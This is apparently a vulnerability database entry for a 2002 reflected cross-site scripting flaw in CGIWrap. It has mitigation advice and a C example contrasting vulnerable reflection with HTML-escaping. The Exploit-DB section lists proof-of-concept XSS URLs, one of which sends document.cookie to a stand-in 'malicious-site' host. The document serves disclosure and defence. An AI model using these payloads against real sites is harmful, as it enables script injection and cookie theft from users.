Vendor: CGIWrap
By: SecurityFocus
CVSS: 7.5 (HIGH)
CWE: 79 (Cross-site Scripting (XSS))
Product Name: CGIWrap
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: cgiwrap
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

CGIWrap does not filter embedded scripting commands from user-supplied input

CGIWrap is a free, open-source program for running CGI scripts securely. The flaw is a reflected cross-site scripting (XSS) vulnerability: the script path supplied in the request URL is echoed back in CGIWrap's response without being HTML-encoded, so markup or script embedded in that path is rendered and executed by the browser. An attacker can craft such a link and place it anywhere links are displayed to other users, such as guestbooks or forums. A user who follows the link has the attacker's script executed in their browser in the context of the vulnerable site, which permits arbitrary JavaScript execution and theft of cookies issued by that site.

Mitigation:

Apply the vendor's patch. For the underlying defect, output encoding is the primary fix: HTML-escape any user-controlled value (here, the requested script path) before writing it into a response, so that '<', '>', '&' and quotes are emitted as text rather than as markup. Input validation is a useful second layer: reject script names containing characters that can never appear in a legitimate path, but do not rely on it alone, since filtering input does not protect output contexts that encoding does.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3081/info

CGIWrap is a free, open-source program for running CGI securely.

CGIWrap does not filter embedded scripting commands from user-supplied input. A web user may submit a malicious link into any form which displays user-supplied input, such as guestbooks, forums, etc. Users clicking on the link will have the malicious scripting commands executed in their browser.

http://www.example.org/cgi-bin/cgiwrap/%3CS%3E
http://www.example.org/cgi-bin/cgiwrap/<S>
http://www.example.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S>

JavaScript code will be executed:

http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT>
http://www.example.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)>

Stealing your Cookies issued by www.example.org, if any:

http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
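The following C program is an added example, not CGIWrap's own code, illustrating the reflection described above and the output-encoding fix from the Mitigation section, using the proof-of-concept paths from the URLs above as constructed inputs. The function names, the "Script not found" error page and the assumption that the wrapper receives the requested path as a single string (as a web server passes it in PATH_INFO) are hypothetical.

```c
/* Added example (not CGIWrap's own code): a CGI wrapper that reflects the
 * requested script path in an HTML error page, shown in a vulnerable form
 * and a hardened form. The error-page wording and function names are
 * hypothetical; the payloads are taken from the advisory's URLs. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Percent-decode a URL path component into a new buffer (caller frees).
 * Web servers hand CGI programs a decoded PATH_INFO, so "%3CS%3E" and
 * "<S>" reach the wrapper as the same bytes; this makes that explicit. */
char *url_decode(const char *s)
{
    size_t n = strlen(s), j = 0;
    char *out = malloc(n + 1);
    if (!out) return NULL;
    for (size_t i = 0; i < n; i++) {
        if (s[i] == '%' && i + 2 < n &&
            isxdigit((unsigned char)s[i + 1]) && isxdigit((unsigned char)s[i + 2])) {
            char hex[3] = { s[i + 1], s[i + 2], '\0' };
            out[j++] = (char)strtol(hex, NULL, 16);
            i += 2;
        } else {
            out[j++] = s[i];
        }
    }
    out[j] = '\0';
    return out;
}

/* HTML-escape for element-content and attribute contexts (caller frees).
 * Longest replacement is 6 bytes, so n*6+1 always suffices. */
char *html_escape(const char *s)
{
    size_t n = strlen(s), j = 0;
    char *out = malloc(n * 6 + 1);
    if (!out) return NULL;
    for (size_t i = 0; i < n; i++) {
        const char *rep = NULL;
        switch (s[i]) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        if (rep) { size_t l = strlen(rep); memcpy(out + j, rep, l); j += l; }
        else out[j++] = s[i];
    }
    out[j] = '\0';
    return out;
}

/* Vulnerable pattern: the decoded path is written into HTML verbatim. */
int error_page_vulnerable(char *buf, size_t cap, const char *raw_path)
{
    char *path = url_decode(raw_path);
    if (!path) return -1;
    int n = snprintf(buf, cap, "<html><body>Script not found: %s</body></html>", path);
    free(path);
    return n;
}

/* Hardened pattern: identical page, but the path is HTML-escaped first. */
int error_page_safe(char *buf, size_t cap, const char *raw_path)
{
    char *path = url_decode(raw_path);
    char *esc = path ? html_escape(path) : NULL;
    int n = -1;
    if (esc) n = snprintf(buf, cap, "<html><body>Script not found: %s</body></html>", esc);
    free(path);
    free(esc);
    return n;
}

/* Detection helper: 1 if the page still contains a live <script tag
 * (case-insensitive), 0 otherwise. */
int contains_script_tag(const char *html)
{
    const char *tag = "<script";
    size_t tl = strlen(tag);
    for (const char *p = html; *p; p++) {
        size_t k = 0;
        while (k < tl && p[k] && tolower((unsigned char)p[k]) == tag[k]) k++;
        if (k == tl) return 1;
    }
    return 0;
}

int main(void)
{
    /* Constructed inputs: the part of the advisory's URLs after /cgiwrap/. */
    const char *payloads[] = {
        "%3CS%3E",
        "~nneul/<SCRIPT>alert(document.domain)</SCRIPT>",
        "<IMG%20SRC=javascript:alert(document.domain)>",
    };
    char page[1024];
    for (size_t i = 0; i < sizeof payloads / sizeof payloads[0]; i++) {
        error_page_vulnerable(page, sizeof page, payloads[i]);
        printf("vulnerable: %s\n", page);
        error_page_safe(page, sizeof page, payloads[i]);
        printf("safe:       %s\n", page);
    }
    return 0;
}
```

Compile with cc -std=c99 and run; the vulnerable variant emits the payload as live markup for both the percent-encoded and the literal forms, because decoding happens before the reflection, while the hardened variant emits it as inert text. Escaping at the output point is what closes the hole; a filter on input would have to anticipate every encoding and tag variant the raw data above already shows.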